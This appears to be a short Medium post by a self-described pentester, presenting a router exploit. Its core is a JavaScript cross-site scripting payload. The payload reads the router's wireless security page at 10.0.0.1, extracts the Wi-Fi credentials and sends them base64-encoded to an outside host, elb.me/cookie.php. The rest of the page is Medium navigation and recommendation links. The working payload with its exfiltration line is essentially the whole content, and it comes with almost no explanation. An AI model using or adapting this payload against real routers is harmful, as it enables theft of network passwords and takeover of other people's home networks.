Router exploit: Getting Wireless Password and Administrator Session Without Being Connected on the Same Network.

How it started:

XSS:

var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
alert(rawFile.responseText);
var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
// selects the part of the page with the credentials
new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
// sends the credentials encoded in base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//take the page source /popupSiteSurveyRpm.htm
rawFile.send();

--

--

--

Pentester , CTF player, Bug Hunter & Security Researcher \nTwitter: https://twitter.com/elber333

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

How to Installing Magento 2 on AWS Cloud using Terraform

How to Create Custom Renderers for a Control in Xamarin.Forms

How to Create Custom Renderers for a Control in Xamarin.Forms

Forming an Opinion About Privacy

CoinTiger Pool Adds CTHAI

Languages and Counting

Random Numbers

Big Data in the Cloud

Top 5 Big Data Frameworks Java Developers Can Learn in 2022

Django — backend development made simple

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Elber Andre

Elber Andre

Pentester , CTF player, Bug Hunter & Security Researcher \nTwitter: https://twitter.com/elber333

More from Medium

Lab: Reflected XSS in a JavaScript URL with some characters blocked

Use Nile CLI for Cairo with Windows PowerShell

Installing Opigno 3.x on Ubuntu 20.04LTS

Web Exploitation: A Developer’s Doom